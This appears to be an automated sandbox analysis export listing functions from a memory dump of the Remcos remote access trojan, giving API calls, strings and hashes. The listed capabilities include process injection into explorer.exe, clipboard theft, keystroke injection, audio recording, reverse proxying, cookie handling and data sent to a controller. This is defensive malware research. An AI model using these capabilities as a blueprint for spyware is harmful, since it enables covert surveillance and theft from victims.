                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                      • API String ID: 489098229-3790400642
                                      • Opcode ID: deef45df4f22c389c0716cf8f40ade19fa9cd261f26cd59d00a8639099d7e17b
                                      • Instruction ID: afae54a23823fed84ee91ceb697004685087a3e26739d4ea8dd4acba519c56b5
                                      • Opcode Fuzzy Hash: deef45df4f22c389c0716cf8f40ade19fa9cd261f26cd59d00a8639099d7e17b
                                      • Instruction Fuzzy Hash: 0F517071E112549ADB1AFBB8C894AFE7FBAAF45300F8000D9E549AB1D0EF749D45CB50
                                      APIs
                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,02B56FFF), ref: 02B55F27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: 83d0efee825bbcc21a85d8a1d5168d47ba8cdb0a350b1e13e4d12319f8cd10b8
                                      • Instruction ID: 69d0fbf57f090ce1096a03c45fdebdb98ec3595daa45df428310c070975c69f9
                                      • Opcode Fuzzy Hash: 83d0efee825bbcc21a85d8a1d5168d47ba8cdb0a350b1e13e4d12319f8cd10b8
                                      • Instruction Fuzzy Hash: 97518F7190062ACBCF24DF68EA8C6BDBBB8FF49315F9845C5D841AF254CB359924CB18
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 02B174F5
                                        • Part of subcall function 02B1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02B0A843), ref: 02B1C49E
                                      • Sleep.KERNEL32(00000064), ref: 02B17521
                                      • DeleteFileW.KERNEL32(00000000), ref: 02B17555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreateDeleteExecuteShellSleep
                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                      • API String ID: 1462127192-2001430897
                                      • Opcode ID: 955b50652c95bbc865e8188c060b475994b2319473116d2f62991fa255f2a0cb
                                      • Instruction ID: b7727afcc04ed7211688d049d60cf1a778b9f581bb5e35ca186aa529c5c498d9
                                      • Opcode Fuzzy Hash: 955b50652c95bbc865e8188c060b475994b2319473116d2f62991fa255f2a0cb
                                      • Instruction Fuzzy Hash: CB3161719502199ADB0AFBA4DCD5EFDBF7AEF10305F4001D9E50A670E0EF605A8ACE94
                                      APIs
                                      • GetCurrentProcess.KERNEL32(02B72B14,00000000,02B752D8,00003000,00000004,00000000,00000001), ref: 02B073DD
                                      • GetCurrentProcess.KERNEL32(02B72B14,00000000,00008000,?,00000000,00000001,00000000,02B07656,C:\Windows\SysWOW64\rundll32.exe), ref: 02B0749E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess
                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                      • API String ID: 2050909247-4242073005
                                      • Opcode ID: 737799e6c2bfec6b0d7faba9e0bbe5bd14d2ce069097a86bf7246f5a32c46d0e
                                      • Instruction ID: 0d2e4275519d9f67c78501e091c424beb2c46c52bcaac2d14b22e57eddcc8100
                                      • Opcode Fuzzy Hash: 737799e6c2bfec6b0d7faba9e0bbe5bd14d2ce069097a86bf7246f5a32c46d0e
                                      • Instruction Fuzzy Hash: 2A31A671A80300ABE322EF64DC89F26FBB9EB44341F140C94F95197691DB74F8189B61
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02B1D476
                                        • Part of subcall function 02B1D50F: RegisterClassExA.USER32(00000030), ref: 02B1D55B
                                        • Part of subcall function 02B1D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02B1D576
                                        • Part of subcall function 02B1D50F: GetLastError.KERNEL32 ref: 02B1D580
                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 02B1D4AD
                                      • lstrcpynA.KERNEL32(02B74B60,Remcos,00000080), ref: 02B1D4C7
                                      • Shell_NotifyIconA.SHELL32(00000000,02B74B48), ref: 02B1D4DD
                                      • TranslateMessage.USER32(?), ref: 02B1D4E9
                                      • DispatchMessageA.USER32(?), ref: 02B1D4F3
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02B1D500
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                      • String ID: Remcos
                                      • API String ID: 1970332568-165870891
                                      • Opcode ID: b9fac93823becb0d354ede2a20987cf50e6f6e172abf598c57b0a85cbe2f5ac7
                                      • Instruction ID: 1b89ac02f44c26c453ee31647db5c48acd8b87a54121dec55f3c4dc137394fcb
                                      • Opcode Fuzzy Hash: b9fac93823becb0d354ede2a20987cf50e6f6e172abf598c57b0a85cbe2f5ac7
                                      • Instruction Fuzzy Hash: 4A01A175C80359EBE7109FA5EC0CF9ABBBCEB81B41F004859F21187180D7B85469CB90
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f1acb8e1b369bd5e42b0716e5a813ebc870961d184a6aeabeef32399c2690092
                                      • Instruction ID: a28a1faae24fe393c70d90c4dff175b3537c3d330aebaa238f948690e2081dcc
                                      • Opcode Fuzzy Hash: f1acb8e1b369bd5e42b0716e5a813ebc870961d184a6aeabeef32399c2690092
                                      • Instruction Fuzzy Hash: 7FC1B070E0424AAFDB15DFA8C8C0BADBBB5EF09314F1445C9E914AB382CB35A945DB61
                                      APIs
                                      • GetCPInfo.KERNEL32(?,?), ref: 02B53E2F
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 02B53EB2
                                      • __alloca_probe_16.LIBCMT ref: 02B53EEA
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02B53F45
                                      • __alloca_probe_16.LIBCMT ref: 02B53F94
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 02B53F5C
                                        • Part of subcall function 02B46137: RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02B53FD8
                                      • __freea.LIBCMT ref: 02B54003
                                      • __freea.LIBCMT ref: 02B5400F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 201697637-0
                                      • Opcode ID: 04ee3a83ab3660670066a1e251061c8157c33868e9c22ee56308ebabda4b57c1
                                      • Instruction ID: d7cb32016e57d430c3da39206a63feaadb2c52f4d9561fa9f00568065d6c2495
                                      • Opcode Fuzzy Hash: 04ee3a83ab3660670066a1e251061c8157c33868e9c22ee56308ebabda4b57c1
                                      • Instruction Fuzzy Hash: 0E918071E002269BDB219E65C885BEEBBF5EF09794F1845D9EC05EF280D735D881CBA0
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • _memcmp.LIBVCRUNTIME ref: 02B45423
                                      • _free.LIBCMT ref: 02B45494
                                      • _free.LIBCMT ref: 02B454AD
                                      • _free.LIBCMT ref: 02B454DF
                                      • _free.LIBCMT ref: 02B454E8
                                      • _free.LIBCMT ref: 02B454F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast$_abort_memcmp
                                      • String ID: C
                                      • API String ID: 1679612858-1037565863
                                      • Opcode ID: 76a7aae4a18f36757ab03e8856c5e55abec745ab17bd3f198ce95de505059b95
                                      • Instruction ID: 98f084316e9b543be13acd820f6b7a7e3cb502b9b2b60482bab0114a01c8cae4
                                      • Opcode Fuzzy Hash: 76a7aae4a18f36757ab03e8856c5e55abec745ab17bd3f198ce95de505059b95
                                      • Instruction Fuzzy Hash: E3B13975A01619DBDB24DF18C884BADB7B5FF18304F9485EAD94AA7350EB30AE90DF40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: tcp$udp
                                      • API String ID: 0-3725065008
                                      • Opcode ID: e17b7bac0a00844aa016adee309e65527397a9a36e27b0b7cfe38e11c83c517d
                                      • Instruction ID: c209574ca3c296397a0ff14f8c8b708864c858115fa5c57fcfc4e9f14994fd00
                                      • Opcode Fuzzy Hash: e17b7bac0a00844aa016adee309e65527397a9a36e27b0b7cfe38e11c83c517d
                                      • Instruction Fuzzy Hash: D1715874A083428FDB24CF14C484B2BB7F5EF88399F9548AEF89587294E774C944DB92
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Eventinet_ntoa
                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                      • API String ID: 3578746661-168337528
                                      • Opcode ID: b17a088b83c23118fe253a71e095cae54ba3ecfa2fa2c3b7bc26b9576722154e
                                      • Instruction ID: ef1a4770f6f68002563614c8aafd5b495b47432d742e1c888bea772d4765db9c
                                      • Opcode Fuzzy Hash: b17a088b83c23118fe253a71e095cae54ba3ecfa2fa2c3b7bc26b9576722154e
                                      • Instruction Fuzzy Hash: D851E771E542405BCB19FB3CC859A7E7BA6EF45380F8009D9E90A876D0EF748919CB92
                                      APIs
                                        • Part of subcall function 02B17F2C: __EH_prolog.LIBCMT ref: 02B17F31
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,02B660A4), ref: 02B17DDC
                                      • CloseHandle.KERNEL32(00000000), ref: 02B17DE5
                                      • DeleteFileA.KERNEL32(00000000), ref: 02B17DF4
                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 02B17DA8
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                      • String ID: <$@$Temp
                                      • API String ID: 1704390241-1032778388
                                      • Opcode ID: bcad68e9506b79647199f62bd2c61d550ab6a63a6a552474f3bdd03a43e93a17
                                      • Instruction ID: 75ce539180bdd1d06460f208c349091a91ef0eedd24006b493159ff7561ee21b
                                      • Opcode Fuzzy Hash: bcad68e9506b79647199f62bd2c61d550ab6a63a6a552474f3bdd03a43e93a17
                                      • Instruction Fuzzy Hash: 9F4160319502099BDB19FB64DC95AFEBB7AAF10350F8041E8E50A674D0EF741A99CF90
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,02B74EE0,02B65FA4,?,00000000,02B07FFC,00000000), ref: 02B079C5
                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,02B07FFC,00000000,?,?,0000000A,00000000), ref: 02B07A0D
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      • CloseHandle.KERNEL32(00000000,?,00000000,02B07FFC,00000000,?,?,0000000A,00000000), ref: 02B07A4D
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 02B07A6A
                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 02B07A95
                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 02B07AA5
                                        • Part of subcall function 02B04B96: WaitForSingleObject.KERNEL32(?,000000FF,?,02B74EF8,02B04C49,00000000,?,?,?,02B74EF8,?), ref: 02B04BA5
                                        • Part of subcall function 02B04B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B0548B), ref: 02B04BC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                      • String ID: .part
                                      • API String ID: 1303771098-3499674018
                                      • Opcode ID: 9e7e6e170d8b238113f6f07ec25eb7643c126447c31a79c6b04b50d70fc57ee2
                                      • Instruction ID: 269b66d341fcf2830e0ddf5b53a91a3ac61b1df8b1d10f68abf26f2ac5463707
                                      • Opcode Fuzzy Hash: 9e7e6e170d8b238113f6f07ec25eb7643c126447c31a79c6b04b50d70fc57ee2
                                      • Instruction Fuzzy Hash: 14319D71508350AFC316EB24D884A9FFBADFF84354F004959B58A93180EF74EA48CF96
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,02B2DD01,?,?,?,02B4AE9A,00000001,00000001,?), ref: 02B4ACA3
                                      • __alloca_probe_16.LIBCMT ref: 02B4ACDB
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,02B2DD01,?,?,?,02B4AE9A,00000001,00000001,?), ref: 02B4AD29
                                      • __alloca_probe_16.LIBCMT ref: 02B4ADC0
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02B4AE23
                                      • __freea.LIBCMT ref: 02B4AE30
                                        • Part of subcall function 02B46137: RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      • __freea.LIBCMT ref: 02B4AE39
                                      • __freea.LIBCMT ref: 02B4AE5E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                      • String ID:
                                      • API String ID: 3864826663-0
                                      • Opcode ID: dc6bb84cd6d161fee79fe9b336cb837dc86615969246c1b7977b90c68816e013
                                      • Instruction ID: 96a1cb2bf6d4864aaddb1c4227a7b895ee067491da52d14c9aa59e4f991d7dd4
                                      • Opcode Fuzzy Hash: dc6bb84cd6d161fee79fe9b336cb837dc86615969246c1b7977b90c68816e013
                                      • Instruction Fuzzy Hash: 7551D472680216AFDB259E64CCD0EBB77AAEB44754F2546A8FC14D7180EF34DC50EB90
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02B199CC
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02B199ED
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02B19A0D
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02B19A21
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 02B19A37
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02B19A54
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 02B19A6F
                                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 02B19A8B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputSend
                                      • String ID:
                                      • API String ID: 3431551938-0
                                      • Opcode ID: e4a501d54be48a91b3e7df35ee58ce5326afaacbce48991f2f33c4c81ac5a534
                                      • Instruction ID: 9cb40f3dcf7a90fcc99c774c8f2611f020f2d314fa27d7f7ebba52acf85cff5b
                                      • Opcode Fuzzy Hash: e4a501d54be48a91b3e7df35ee58ce5326afaacbce48991f2f33c4c81ac5a534
                                      • Instruction Fuzzy Hash: 0A318131558348AEE311CF51D941BEBBBDCEF88B54F40080EF6809A1C1D3A2A5C98BA7
                                      APIs
                                      • OpenClipboard.USER32 ref: 02B16941
                                      • EmptyClipboard.USER32 ref: 02B1694F
                                      • CloseClipboard.USER32 ref: 02B16955
                                      • OpenClipboard.USER32 ref: 02B1695C
                                      • GetClipboardData.USER32(0000000D), ref: 02B1696C
                                      • GlobalLock.KERNEL32(00000000), ref: 02B16975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02B1697E
                                      • CloseClipboard.USER32 ref: 02B16984
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                      • String ID:
                                      • API String ID: 2172192267-0
                                      • Opcode ID: f25d797f208ff29cc3bb4334509499867cc52d1cb9d57a673299ff61c4f9bed1
                                      • Instruction ID: 33e116f4a56dc2a9be54fc842b2bfced44f78fbdcdce3099d437552316685d8f
                                      • Opcode Fuzzy Hash: f25d797f208ff29cc3bb4334509499867cc52d1cb9d57a673299ff61c4f9bed1
                                      • Instruction Fuzzy Hash: 92017132654710DFC728BB75D84C7AE7BAAEF84781F8048EDE50A871C0DF348854CAA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 25463946b00dffe3cd812b67394d4a2028c8f67d460a200a56d704e2c6177031
                                      • Instruction ID: dd9e0a2c7e8bc57d7d8ab34601137c58da9cc221e579ac326203af72e8f87dc9
                                      • Opcode Fuzzy Hash: 25463946b00dffe3cd812b67394d4a2028c8f67d460a200a56d704e2c6177031
                                      • Instruction Fuzzy Hash: 8761E071D00215AFDB20EF68C881B9ABBF5EB09724F1449EAED54EF241EB709D41CB90
                                      APIs
                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,02B4BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 02B4B3FE
                                      • __fassign.LIBCMT ref: 02B4B479
                                      • __fassign.LIBCMT ref: 02B4B494
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 02B4B4BA
                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,02B4BB31,00000000,?,?,?,?,?,?,?,?,?,02B4BB31,?), ref: 02B4B4D9
                                      • WriteFile.KERNEL32(?,?,00000001,02B4BB31,00000000,?,?,?,?,?,?,?,?,?,02B4BB31,?), ref: 02B4B512
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 42d96976803e0c1f1c2901e39d31d8ffbd266216987859f56166e24e09df7665
                                      • Instruction ID: 21d0093d8991973ba68c92e5b8420de12c37c645315c118a77d769ad7404259d
                                      • Opcode Fuzzy Hash: 42d96976803e0c1f1c2901e39d31d8ffbd266216987859f56166e24e09df7665
                                      • Instruction Fuzzy Hash: CD51A171D00209AFDB10CFA8D895AEEBBF8EF08304F14459AEA55E7281DB30E951CB60
                                      APIs
                                      • _strftime.LIBCMT ref: 02B01D50
                                        • Part of subcall function 02B01A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02B01AD9
                                      • waveInUnprepareHeader.WINMM(02B72A88,00000020,00000000,?), ref: 02B01E02
                                      • waveInPrepareHeader.WINMM(02B72A88,00000020), ref: 02B01E40
                                      • waveInAddBuffer.WINMM(02B72A88,00000020), ref: 02B01E4F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                      • String ID: %Y-%m-%d %H.%M$.wav
                                      • API String ID: 3809562944-3597965672
                                      • Opcode ID: a1bcfa990997c42594ff5c518f9972ef43227a135c4b9f82e422a6b47e132e2f
                                      • Instruction ID: 5da2923b564fd08fbd47018b3bc88c6051e68beaef4b79013f5ce5a61e4bb746
                                      • Opcode Fuzzy Hash: a1bcfa990997c42594ff5c518f9972ef43227a135c4b9f82e422a6b47e132e2f
                                      • Instruction Fuzzy Hash: 2E31A2319543009FD32AEB24D895A9E7BEAFB44350F4048A9E5AD931E0EF709919CF92
                                      APIs
                                        • Part of subcall function 02B135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 02B135CA
                                        • Part of subcall function 02B135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 02B135E7
                                        • Part of subcall function 02B135A6: RegCloseKey.KERNEL32(?), ref: 02B135F2
                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 02B0BF6B
                                      • PathFileExistsA.SHLWAPI(?), ref: 02B0BF78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                      • API String ID: 1133728706-4073444585
                                      • Opcode ID: da3e52705d9059a545200f8262d85f1b1c2ac69452f031736a2079ddf77a7d82
                                      • Instruction ID: e79210b67aabb919f985e522965e4ce2c022c7e62ff0fa423ba4b9b2671b861d
                                      • Opcode Fuzzy Hash: da3e52705d9059a545200f8262d85f1b1c2ac69452f031736a2079ddf77a7d82
                                      • Instruction Fuzzy Hash: BB219371A50219AADB1AF7B4CCDADFE7B2AAF10304F8400D9E906671D0EF649949CFD1
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c07c2ffca774b67ca410ad648deaf6acdd6a40fa39fa99bf3186f5730ca3a87
                                      • Instruction ID: 335d6f143cb36ae2ed878741c07fe623536cd0ac5f2afa5ce9ac824f3e77fa0c
                                      • Opcode Fuzzy Hash: 8c07c2ffca774b67ca410ad648deaf6acdd6a40fa39fa99bf3186f5730ca3a87
                                      • Instruction Fuzzy Hash: 2811B172904625BBDB212F768C84F6F7BADEF81774B404A95FC11DB250DE348841DAA0
                                      APIs
                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02B1B3A7
                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 02B1B3BD
                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 02B1B3D6
                                      • InternetCloseHandle.WININET(00000000), ref: 02B1B41C
                                      • InternetCloseHandle.WININET(00000000), ref: 02B1B41F
                                      Strings
                                      • http://geoplugin.net/json.gp, xrefs: 02B1B3B7
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleOpen$FileRead
                                      • String ID: http://geoplugin.net/json.gp
                                      • API String ID: 3121278467-91888290
                                      • Opcode ID: 854b924130ec9a17b802a046cd469812ac5a3c0d7d440cae2eae59688b432a1e
                                      • Instruction ID: f1198bf8862b04e8c5a0de5a1d020a22d75292fcd08c495f90bd8db1313b2001
                                      • Opcode Fuzzy Hash: 854b924130ec9a17b802a046cd469812ac5a3c0d7d440cae2eae59688b432a1e
                                      • Instruction Fuzzy Hash: 4411E7315063216BD634AB259C89EBF7FADEF85764F44086DF80593180DB649C48CAF2
                                      APIs
                                        • Part of subcall function 02B50C41: _free.LIBCMT ref: 02B50C6A
                                      • _free.LIBCMT ref: 02B50F48
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • _free.LIBCMT ref: 02B50F53
                                      • _free.LIBCMT ref: 02B50F5E
                                      • _free.LIBCMT ref: 02B50FB2
                                      • _free.LIBCMT ref: 02B50FBD
                                      • _free.LIBCMT ref: 02B50FC8
                                      • _free.LIBCMT ref: 02B50FD3
                                      Memory Dump Source
